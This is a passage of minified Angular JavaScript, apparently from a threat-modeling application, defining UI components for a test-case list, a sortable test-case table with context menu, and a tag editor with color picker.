"),m(2,"div",18),s(3,"\n          "),it(4,"app-test-case",19),s(5,"\n        "),u(),s(6,"\n      "),Mt()),2&t){const e=B();C(4),V("testCase",e.selectedTestCase)}}let j0t=(()=>{class t{constructor(e,i){this.dataService=e,this.theme=i}ngOnInit(){}AddTestCase(){const e=this.dataService.Project.CreateTestCase();return this.testing.AddTestCase(e),this.selectedTestCase=e,setTimeout(()=>{document.dispatchEvent(new KeyboardEvent("keydown",{key:"F2"}))},250),e}DeleteTestCase(e){this.selectedTestCase==e&&(this.selectedTestCase=null),this.dataService.Project.DeleteTestCase(e)}ResetNumbers(){const e=this.dataService.Project.GetTesting().TestCases;for(let i=0;i<e.length;i++)e[i].Number=(i+1).toString()}drop(e){Qs(this.testing.Data.testCaseIDs,e.previousIndex,e.currentIndex)}GetStatus(e){return Qg.ToString(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Yi),Ee(Oa))},t.\u0275cmp=Wt({type:t,selectors:[["app-testing"]],inputs:{testing:"testing"},decls:54,vars:25,consts:[[2,"margin","10px"],[1,"row"],[1,"column1"],["cdkDropList","",1,"prop-list","reorder-list",3,"cdkDropListDropped"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matTooltip","click"],["mat-icon-button","","matTooltipShowDelay","1000",2,"float","right",3,"matMenuTriggerFor","matTooltip"],["moreMenu","matMenu"],["mat-menu-item","",3,"disabled","click"],["cdkDrag","",3,"highlight-light","highlight-dark","click",4,"ngFor","ngForOf"],[1,"column2"],[4,"ngIf"],["appearance","fill",2,"width","100%","margin-top","10px"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],["cdkDrag","",3,"click"],["mat-list-icon",""],["mat-line",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],[2,"margin-left","10px"],[3,"testCase"]],template:function(e,i){if(1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"div",1),s(3,"\n    "),m(4,"div",2),s(5,"\n      "),m(6,"mat-list",3),he("cdkDropListDropped",function(r){return i.drop(r)}),s(7,"\n        "),m(8,"div",4),s(9),oe(10,"translate"),m(11,"button",5),he("click",function(){return i.AddTestCase()}),oe(12,"translate"),m(13,"mat-icon"),s(14,"add"),u()(),s(15,"\n          "),m(16,"button",6),oe(17,"translate"),m(18,"mat-icon"),s(19,"more_vert"),u()(),s(20,"\n          "),m(21,"mat-menu",null,7),s(23,"\n            "),m(24,"button",8),he("click",function(){return i.ResetNumbers()}),s(25),oe(26,"translate"),u(),s(27,"\n          "),u(),s(28,"\n        "),u(),s(29,"\n        "),ne(30,q0t,18,14,"mat-list-item",9),s(31,"\n      "),u(),s(32,"\n    "),u(),s(33,"\n    "),m(34,"div",10),s(35,"\n      "),ne(36,G0t,7,1,"ng-container",11),s(37,"\n    "),u(),s(38,"\n  "),u(),s(39,"\n  "),it(40,"mat-divider"),s(41,"\n  "),m(42,"div"),s(43,"\n    "),m(44,"mat-form-field",12),s(45,"\n      "),m(46,"mat-label"),s(47),oe(48,"translate"),u(),s(49,"\n      "),m(50,"textarea",13),he("ngModelChange",function(r){return i.testing.Description=r}),u(),s(51,"\n    "),u(),s(52,"\n  "),u(),s(53,"\n"),u()),2&e){const n=Ti(22);C(6),Ct("prop-list-light",!i.theme.IsDarkMode)("prop-list-dark",i.theme.IsDarkMode),C(3),ct("",re(10,15,"general.TestCases"),"\n          "),C(2),at("matTooltip",re(12,17,"general.Add")),C(5),at("matTooltip",re(17,19,"general.More")),V("matMenuTriggerFor",n),C(8),V("disabled",i.testing.TestCases.length<2),C(1),ke(re(26,21,"pages.modeling.threattable.resetNumbers")),C(5),V("ngForOf",i.testing.TestCases),C(6),V("ngIf",i.selectedTestCase),C(11),ke(re(48,23,"general.Notes")),C(3),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.testing.Description)}},dependencies:[Zi,Ri,an,Ta,Ea,Sd,kd,oa,da,nn,un,Go,Xa,ts,is,Or,Lr,rc,pp,Xo,qo,po,Pa,gM,Xi],styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}']}),t})();function Q0t(t,a){1&t&&it(0,"mat-progress-spinner",22),2&t&&V("diameter",20)}function $0t(t,a){1&t&&(m(0,"th",23),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Number")," "))}function K0t(t,a){if(1&t&&(m(0,"td",24),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.Number," ")}}function X0t(t,a){1&t&&(m(0,"th",23),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Name")," "))}function Y0t(t,a){if(1&t&&(m(0,"td",24),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.GetProperty("Name")," ")}}function J0t(t,a){1&t&&(m(0,"th",23),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"properties.Status")," "))}function Z0t(t,a){if(1&t&&(m(0,"option",27),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetTestCaseStateName(e)))}}function e1t(t,a){if(1&t){const e=Ye();m(0,"td",24),s(1,"\n          "),m(2,"select",25),he("ngModelChange",function(n){return Me(be(e).$implicit.Status=n)}),s(3,"\n            "),ne(4,Z0t,3,4,"option",26),s(5,"\n          "),u(),s(6,"\n        "),u()}if(2&t){const e=a.$implicit,i=B();C(2),V("ngModel",e.Status),C(2),V("ngForOf",i.GetTestCaseStates())}}function t1t(t,a){1&t&&(m(0,"th",23),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Elements")," "))}function i1t(t,a){if(1&t&&(m(0,"td",24),s(1),u()),2&t){const e=a.$implicit,i=B();Ct("selected-cell",i.IsElementSelected(e)),C(1),ct(" ",i.GetElementNames(e)," ")}}function a1t(t,a){1&t&&(m(0,"th",23),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"properties.Description")," "))}function n1t(t,a){if(1&t&&(m(0,"td",24),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.Description," ")}}function o1t(t,a){1&t&&(m(0,"th",28),s(1," "),u())}function r1t(t,a){if(1&t){const e=Ye();m(0,"td",24),s(1," "),m(2,"mat-icon",29),he("click",function(n){const c=be(e).$implicit;return Me(B().OpenContextMenu(n,c))}),oe(3,"translate"),s(4,"more_vert"),u(),s(5," "),u()}2&t&&(C(2),at("matTooltip",re(3,1,"general.More")))}function s1t(t,a){1&t&&it(0,"tr",30)}function c1t(t,a){if(1&t){const e=Ye();m(0,"tr",31),he("click",function(){const r=be(e).$implicit;return Me(B().SelectTestCase(r))})("dblclick",function(){const r=be(e).$implicit;return Me(B().OpenTestCase(r))})("contextmenu",function(n){const c=be(e).$implicit;return Me(B().OpenContextMenu(n,c))}),s(1,"\n      "),u()}if(2&t){const e=a.$implicit;Ct("selected-item",B().IsTestCaseSelected(e)),V("id",e.ID)}}function l1t(t,a){1&t&&(m(0,"tr",32),s(1,"\n        "),m(2,"td",33),s(3),oe(4,"translate"),u(),s(5,"\n      "),u()),2&t&&(C(3),ke(re(4,1,"pages.modeling.testcasetable.noTestCases")))}function d1t(t,a){if(1&t&&(m(0,"span",36),s(1),u()),2&t){const e=B().item;C(1),ke(e.GetProperty("Name"))}}function m1t(t,a){1&t&&(m(0,"span",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ke(re(2,1,"pages.modeling.threattable.noEntrySelected")))}function u1t(t,a){if(1&t){const e=Ye();s(0,"\n        "),ne(1,d1t,2,1,"span",34),s(2," \n        "),ne(3,m1t,3,3,"span",34),s(4,"\n        "),m(5,"button",35),he("click",function(){const r=be(e).item;return Me(B().OpenTestCase(r))}),s(6,"\n          "),m(7,"mat-icon"),s(8,"edit"),u(),s(9,"\n          "),m(10,"span"),s(11),oe(12,"translate"),u(),s(13,"\n        "),u(),s(14," \n        "),m(15,"button",35),he("click",function(){const r=be(e).item;return Me(B().DeleteTestCase(r))}),s(16,"\n          "),m(17,"mat-icon"),s(18,"delete"),u(),s(19,"\n          "),m(20,"span"),s(21),oe(22,"translate"),u(),s(23,"\n        "),u(),s(24,"\n      ")}if(2&t){const e=a.item;C(1),V("ngIf",e),C(2),V("ngIf",!e),C(2),V("disabled",!e),C(6),ke(re(12,6,"pages.modeling.threattable.editEntry")),C(4),V("disabled",!e),C(6),ke(re(22,8,"pages.modeling.threattable.deleteEntry"))}}let h1t=(()=>{class t{constructor(e,i,n){this.theme=e,this.dataService=i,this.dialog=n,this.changesCounter=0,this.isCalculatingTestCases=!1,this._testCases=[],this.autoRefreshTestCases=!0,this.displayedColumns=["number","name","status","elements","description","more"],this.selectedObjectChanged=new Tt,this.testCaseCountChanged=new Tt,this.menuTopLeftPosition={x:"0",y:"0"};const r=()=>{0==this.changesCounter?setTimeout(()=>{this.isCalculatingTestCases=!0,this.changesCounter++},10):this.changesCounter++,setTimeout(()=>{this.changesCounter--,0==this.changesCounter&&this.RefreshTestCases()},3e3)};this.dataService.Project&&setTimeout(()=>{var c;null===(c=this.dataService.Project)||void 0===c||c.TestCasesChanged.subscribe(d=>r())},1e3)}get refreshingTestCases(){return this.changesCounter>0||this.isCalculatingTestCases}get selectedTestCase(){return this._selectedTestCase}set selectedTestCase(e){this._selectedTestCase=e}get selectedNode(){return this._selectedNode}set selectedNode(e){this._selectedNode=e,this.RefreshTestCases()}get selectedObject(){return this._selectedObject}set selectedObject(e){var i;e&&(null===(i=this._selectedObject)||void 0===i?void 0:i.ID)==e.ID||(this._selectedObject=e)}set filteredObject(e){this._filteredObject=e,this.RefreshTestCases()}get TestCases(){return this._testCases}set TestCases(e){this._filteredObject&&(e=e.filter(i=>i.LinkedElements.includes(this._filteredObject))),this._testCases=e,this.dataSource=new zd(e),this.dataSource.sort=this.sort,this.dataSource.sortingDataAccessor=(i,n)=>"number"==n?Number(i.Number):"name"==n?i.Name:"status"==n?i.Status:"elements"==n?this.GetElementNames(i):"description"==n?i.Description:void console.error("Missing sorting header"),this.sort&&this.sort.sortChange.emit(this.sort)}ngOnInit(){}onKeyDown(e){var i;if(this.isActive&&"TEXTAREA"!=(null===(i=document.activeElement)||void 0===i?void 0:i.tagName)){if(this.selectedTestCase){const n=(r,c)=>{this.SelectTestCase(r[c]);const d=this.rows.find(T=>T.nativeElement.id===r[c].ID);null==d||d.nativeElement.scrollIntoView({block:"center",behavior:"smooth"})};if("ArrowDown"==e.key){const r=this.dataSource.sortData(this.dataSource.filteredData,this.sort),c=r.indexOf(this.selectedTestCase);c<r.length-1&&n(r,c+1)}else if("ArrowUp"==e.key){const r=this.dataSource.sortData(this.dataSource.filteredData,this.sort),c=r.indexOf(this.selectedTestCase);c>0&&n(r,c-1)}}["ArrowDown","ArrowUp"].includes(e.key)&&(e.preventDefault(),e.stopImmediatePropagation())}}RefreshTestCases(){setTimeout(()=>{var e;this.TestCases=[],!(null===(e=this._selectedNode)||void 0===e)&&e.data&&(this.TestCases=this.dataService.Project.GetTestCases().filter(i=>this.GetElements(i).length>0)),this.testCaseCountChanged.emit(this.TestCases.length),this.isCalculatingTestCases=!1},10)}SelectTestCase(e){this.selectedTestCase=e;const i=this.GetElements(e);(null==i?void 0:i.length)>0&&this.selectedObjectChanged.emit(i[0])}OpenTestCase(e){this.dialog.OpenTestCaseDialog(e,!1,this.dataSource.sortData(this.dataSource.filteredData,this.sort))}OpenContextMenu(e,i){e.preventDefault(),this.menuTopLeftPosition.x=e.clientX+"px",this.menuTopLeftPosition.y=e.clientY+"px",this.matMenuTrigger.menuData={item:i},this.matMenuTrigger.openMenu()}DeleteTestCase(e){this.dialog.OpenDeleteObjectDialog(e).subscribe(i=>{i&&(this.dataService.Project.DeleteTestCase(e),this.RefreshTestCases())})}GetElements(e){return e.LinkedElements.filter(i=>{var n,r;return(null===(r=null===(n=this.selectedNode)||void 0===n?void 0:n.data)||void 0===r?void 0:r.ID)==e.GetViewOfLinkedElement(i).ID})}GetElementNames(e){return this.GetElements(e).map(i=>i.Name).join(", ")}IsTestCaseSelected(e){return this.selectedTestCase==e}IsElementSelected(e){return e&&this.selectedObject&&this.GetElements(e).includes(this.selectedObject)}GetTestCaseStates(){return Qg.GetKeys()}GetTestCaseStateName(e){return Qg.ToString(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn))},t.\u0275cmp=Wt({type:t,selectors:[["app-test-case-table"]],viewQuery:function(e,i){if(1&e&&(Mi(al,5),Mi(po,5),Mi(xc,5,mi)),2&e){let n;Vt(n=Bt())&&(i.sort=n.first),Vt(n=Bt())&&(i.matMenuTrigger=n.first),Vt(n=Bt())&&(i.rows=n)}},hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,$c)},inputs:{isActive:"isActive",selectedNode:"selectedNode",selectedObject:"selectedObject",filteredObject:"filteredObject"},outputs:{selectedObjectChanged:"selectedObjectChanged",testCaseCountChanged:"testCaseCountChanged"},decls:83,vars:22,consts:[[2,"height","100%","display","grid","align-content","start"],[1,"tools"],["mat-button","","matTooltipShowDelay","1000",1,"toolBtn",3,"matTooltip","click"],["style","display: inline; vertical-align: super; margin-left: 5px;","mode","indeterminate",3,"diameter",4,"ngIf"],[2,"overflow","auto"],["mat-table","","matSort","","matSortActive","number","matSortDirection","asc","matSortDisableClear","",2,"width","100%",3,"dataSource"],["matColumnDef","number"],["mat-header-cell","","mat-sort-header","",4,"matHeaderCellDef"],["mat-cell","",4,"matCellDef"],["matColumnDef","name"],["matColumnDef","status"],["matColumnDef","elements"],["mat-cell","",3,"selected-cell",4,"matCellDef"],["matColumnDef","description"],["matColumnDef","more"],["mat-header-cell","",4,"matHeaderCellDef"],["mat-header-row","","style","height: 30px;",4,"matHeaderRowDef","matHeaderRowDefSticky"],["mat-row","",3,"id","selected-item","click","dblclick","contextmenu",4,"matRowDef","matRowDefColumns"],["class","mat-row",4,"matNoDataRow"],[2,"visibility","hidden","position","fixed",3,"matMenuTriggerFor"],["rightMenu","matMenu"],["matMenuContent",""],["mode","indeterminate",2,"display","inline","vertical-align","super","margin-left","5px",3,"diameter"],["mat-header-cell","","mat-sort-header",""],["mat-cell",""],[2,"width","140px",3,"ngModel","ngModelChange"],[3,"value",4,"ngFor","ngForOf"],[3,"value"],["mat-header-cell",""],["matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-header-row","",2,"height","30px"],["mat-row","",3,"id","click","dblclick","contextmenu"],[1,"mat-row"],["colspan","5",1,"mat-cell"],["style","margin-left: 20px; margin-right: 20px;",4,"ngIf"],["mat-menu-item","",3,"disabled","click"],[2,"margin-left","20px","margin-right","20px"]],template:function(e,i){if(1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"div",1),s(3,"\n    "),m(4,"button",2),he("click",function(){return i.RefreshTestCases()}),oe(5,"translate"),s(6,"\n      "),m(7,"mat-icon"),s(8,"refresh"),u(),s(9,"\n    "),u(),s(10,"\n    "),m(11,"button",2),he("click",function(){return i.autoRefreshTestCases=!i.autoRefreshTestCases}),oe(12,"translate"),s(13,"\n      "),m(14,"mat-icon"),s(15,"autorenew"),u(),s(16,"\n    "),u(),s(17,"\n    "),ne(18,Q0t,1,1,"mat-progress-spinner",3),s(19,"\n  "),u(),s(20,"\n  "),m(21,"div",4),s(22,"\n    "),m(23,"table",5),s(24,"\n      "),bt(25,6),s(26,"\n        "),ne(27,$0t,3,3,"th",7),s(28,"\n        "),ne(29,K0t,2,1,"td",8),s(30,"\n      "),Mt(),s(31,"\n      "),bt(32,9),s(33,"\n        "),ne(34,X0t,3,3,"th",7),s(35,"\n        "),ne(36,Y0t,2,1,"td",8),s(37,"\n      "),Mt(),s(38,"\n      "),bt(39,10),s(40,"\n        "),ne(41,J0t,3,3,"th",7),s(42,"\n        "),ne(43,e1t,7,2,"td",8),s(44,"\n      "),Mt(),s(45,"\n      "),bt(46,11),s(47,"\n        "),ne(48,t1t,3,3,"th",7),s(49,"\n        "),ne(50,i1t,2,3,"td",12),s(51,"\n      "),Mt(),s(52,"\n      "),bt(53,13),s(54,"\n        "),ne(55,a1t,3,3,"th",7),s(56,"\n        "),ne(57,n1t,2,1,"td",8),s(58,"\n      "),Mt(),s(59,"\n      "),bt(60,14),s(61,"\n        "),ne(62,o1t,2,0,"th",15),s(63,"\n        "),ne(64,r1t,6,3,"td",8),s(65,"\n      "),Mt(),s(66,"\n  \n      "),ne(67,s1t,1,0,"tr",16),s(68,"\n      "),ne(69,c1t,2,3,"tr",17),s(70,"\n      "),ne(71,l1t,6,3,"tr",18),s(72,"\n    "),u(),s(73,"\n    "),it(74,"div",19),s(75," \n    "),m(76,"mat-menu",null,20),s(78," \n      "),ne(79,u1t,25,10,"ng-template",21),s(80," \n    "),u(),s(81," \n  "),u(),s(82,"\n"),u()),2&e){const n=Ti(77);C(4),at("matTooltip",re(5,18,"general.Refresh")),C(7),Ct("toolBtn-Selected",i.autoRefreshTestCases),at("matTooltip",re(12,20,"pages.modeling.threattable.autoRefresh")),C(7),V("ngIf",i.refreshingTestCases),C(5),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("dataSource",i.dataSource),C(44),V("matHeaderRowDef",i.displayedColumns)("matHeaderRowDefSticky",!0),C(2),V("matRowDefColumns",i.displayedColumns),C(5),ri("left",i.menuTopLeftPosition.x)("top",i.menuTopLeftPosition.y),V("matMenuTriggerFor",n)}},dependencies:[Zi,Ri,pm,_m,Ed,Ta,Ea,oa,da,xl,Xo,qo,po,el,Pa,Au,Tu,jh,xm,Dm,Du,Eu,wm,Qh,xc,Cp,al,bp,Xi],styles:[".primary-color[_ngcontent-%COMP%], .selected-cell[_ngcontent-%COMP%], .selected-item[_ngcontent-%COMP%]   td[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}th[_ngcontent-%COMP%], td[_ngcontent-%COMP%]{font-size:small}tr[_ngcontent-%COMP%]{height:30px!important}th.mat-header-cell[_ngcontent-%COMP%]:first-of-type, td.mat-cell[_ngcontent-%COMP%]:first-of-type, td.mat-footer-cell[_ngcontent-%COMP%]:first-of-type{padding-left:5px!important}th.mat-header-cell[_ngcontent-%COMP%]:last-of-type, td.mat-cell[_ngcontent-%COMP%]:last-of-type, td.mat-footer-cell[_ngcontent-%COMP%]:last-of-type{padding-right:5px!important}.removed-item[_ngcontent-%COMP%]{opacity:.3}.tools[_ngcontent-%COMP%]{display:block;float:left;height:27px;width:calc(100% - 20px);font-size:12px}.toolBtn[_ngcontent-%COMP%]{width:30px;min-width:30px;padding:0;line-height:25px;margin-left:5px}.toolBtn-Selected[_ngcontent-%COMP%]{background-color:#ffffff26}.filterInput[_ngcontent-%COMP%]{margin-left:5px;width:200px;height:25px}.disable[_ngcontent-%COMP%]{pointer-events:none}"]}),t})();const f1t=["tagInput"],p1t=function(t){return{"background-color":t}};function _1t(t,a){if(1&t){const e=Ye();m(0,"mat-chip",9),he("removed",function(){const r=be(e).$implicit;return Me(B(2).RemoveTag(r))})("click",function(){be(e);const n=Ti(11);return Me(B(2).OnChipClick(n))}),s(1),m(2,"button",10),s(3,"\n        "),m(4,"mat-icon"),s(5,"cancel"),u(),s(6,"\n      "),u(),s(7,"\n      "),m(8,"input",11),he("ngModelChange",function(n){return Me(be(e).$implicit.ColorPicker=n)}),u(),s(9,"\n      "),it(10,"ngx-mat-color-picker",12,13),s(12,"\n    "),u()}if(2&t){const e=a.$implicit,i=Ti(11);V("ngStyle",fr(5,p1t,e.Color)),C(1),ct("\n      ",e.Name,"\n      "),C(7),V("ngxMatColorPicker",i)("ngModel",e.ColorPicker),C(2),V("color","primary")}}function g1t(t,a){if(1&t){const e=Ye();m(0,"mat-option",14),s(1,"\n      "),m(2,"mat-icon",15),s(3,"circle"),u(),s(4),m(5,"button",16),he("click",function(n){const c=be(e).$implicit;return Me(B(2).DeleteTag(c,n))}),s(6,"\n        "),m(7,"mat-icon"),s(8,"delete"),u(),s(9,"\n      "),u(),s(10,"\n      "),m(11,"button",16),he("click",function(n){const c=be(e).$implicit;return Me(B(2).EditTag(c,n))}),s(12,"\n        "),m(13,"mat-icon"),s(14,"edit"),u(),s(15,"\n      "),u(),s(16,"\n      "),m(17,"button",16),he("click",function(n){const c=be(e).$implicit;return Me(B(2).TagDown(c,n))}),s(18,"\n        "),m(19,"mat-icon"),s(20,"arrow_downward"),u(),s(21,"\n      "),u(),s(22,"\n      "),m(23,"button",16),he("click",function(n){const c=be(e).$implicit;return Me(B(2).TagUp(c,n))}),s(24,"\n        "),m(25,"mat-icon"),s(26,"arrow_upward"),u(),s(27,"\n      "),u(),s(28,"\n    "),u()}if(2&t){const e=a.$implicit;V("value",e),C(2),ri("color",e.Color),C(2),ct("\n      ",e.Name,"\n      ")}}function C1t(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",1),s(1,"\n  "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n  "),m(6,"mat-chip-list",null,2),s(8,"\n    "),ne(9,_1t,13,7,"mat-chip",3),s(10,"\n    "),m(11,"input",4,5),he("matChipInputTokenEnd",function(n){return be(e),Me(B().AddTag(n))}),oe(13,"translate"),u(),s(14,"\n  "),u(),s(15,"\n  "),m(16,"mat-autocomplete",6,7),he("optionSelected",function(n){return be(e),Me(B().SelectedTag(n))}),s(18,"\n    "),ne(19,g1t,29,4,"mat-option",8),oe(20,"async"),s(21,"\n  "),u(),s(22,"\n"),u()}if(2&t){const e=Ti(7),i=Ti(17),n=B();C(3),ke(re(4,8,"general.Tags")),C(6),V("ngForOf",n.tagableElement.MyTags),C(2),at("placeholder",re(13,10,"properties.newTag")),V("formControl",n.tagCtrl)("matAutocomplete",i)("matChipInputFor",e)("matChipInputSeparatorKeyCodes",n.separatorKeysCodes),C(8),V("ngForOf",re(20,12,n.filteredTags))}}let RZ=(()=>{class t{constructor(e,i){this.dataService=e,this.dialog=i,this.separatorKeysCodes=[13,188],this.tagCtrl=new lu(""),this.colorCtr=new lu(new kp(255,243,0)),this.filteredTags=this.tagCtrl.valueChanges.pipe(Ro(null),Xe(n=>n?this._filterTag(n):this.dataService.Project.GetMyTags().slice()))}ngOnInit(){}AddTag(e){const i=(e.value||"").trim();if(i)if(this.dataService.Project.GetMyTags().map(n=>n.Name).includes(i))this.tagableElement.AddMyTag(this.dataService.Project.GetMyTags().find(n=>n.Name==i));else{const n=this.dataService.Project.CreateMyTag();n.Name=i,this.tagableElement.AddMyTag(n)}e.chipInput.clear(),this.tagCtrl.setValue(null)}RemoveTag(e){this.tagableElement.RemoveMyTag(e.ID)}DeleteTag(e,i){this.dialog.OpenDeleteObjectDialog(e).subscribe(n=>{n&&(this.dataService.Project.DeleteMyTag(e),this.tagCtrl.setValue(null))}),i.stopPropagation()}EditTag(e,i){this.dialog.OpenRenameDialog(e,e.GetProperties().find(n=>"Name"==n.ID)),i.stopPropagation()}TagDown(e,i){const n=this.dataService.Project.GetMyTags(),r=n.indexOf(e);r!=n.length-1&&Qs(n,r,r+1),this.filteredTags=this.tagCtrl.valueChanges.pipe(Ro(null),Xe(c=>c?this._filterTag(c):this.dataService.Project.GetMyTags().slice())),i.stopPropagation()}TagUp(e,i){const n=this.dataService.Project.GetMyTags(),r=n.indexOf(e);0!=r&&Qs(n,r,r-1),this.filteredTags=this.tagCtrl.valueChanges.pipe(Ro(null),Xe(c=>c?this._filterTag(c):this.dataService.Project.GetMyTags().slice())),i.stopPropagation()}SelectedTag(e){this.tagableElement.AddMyTag(e.option.value),this.tagInput.nativeElement.value="",this.tagCtrl.setValue(null)}OnChipClick(e){e.open()}_filterTag(e){let i="";return i=e instanceof pM?e.Name.toLowerCase():e.toLowerCase(),this.dataService.Project.GetMyTags().filter(n=>n.Name.toLowerCase().includes(i))}}return t.\u0275fac=function(e){return new(e||t)(Ee(Yi),Ee(Wn))},t.\u0275cmp=Wt({type:t,selectors:[["app-tags"]],viewQuery:function(e,i){if(1&e&&Mi(f1t,5),2&e){let n;Vt(n=Bt())&&(i.tagInput=n.first)}},inputs:{tagableElement:"tagableElement"},decls:1,vars:1,consts:[["style","width: 